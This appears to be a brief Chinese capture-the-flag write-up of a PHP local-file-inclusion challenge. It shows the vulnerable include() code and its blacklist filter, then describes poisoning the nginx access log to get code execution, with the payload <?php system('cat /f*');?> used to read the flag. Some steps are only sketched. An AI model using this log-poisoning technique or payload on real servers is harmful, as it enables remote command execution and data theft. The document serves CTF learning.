这道纯粹记录 完全没想到
<?php
//WEB手要懂得搜索
if(isset($_GET['file'])){
$file = $_GET['file'];
if(preg_match("/php|flag|data|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\_|\+|\=/i", $file)){
die("error");
}
include($file);
}else{
highlight_file(__FILE__);
} 存在文件包含漏洞 过滤 data 等常见利用协议
然后我们看看能读取啥东西
发现啥都可以
那我们通过
这里泄露了中间件
那么我们直接去搜
发现存在一个文件日志包含漏洞
/var/log/nginx/access.log看了看就是会解析php 所以直接传递参数即可传递一个phpinfo
成功执行 那么就直接开始吧 直接穿命令
<?php system('cat /f*');?>
得到flag
这个确实确实确实确实没想到 可以可以 又学到一个东西
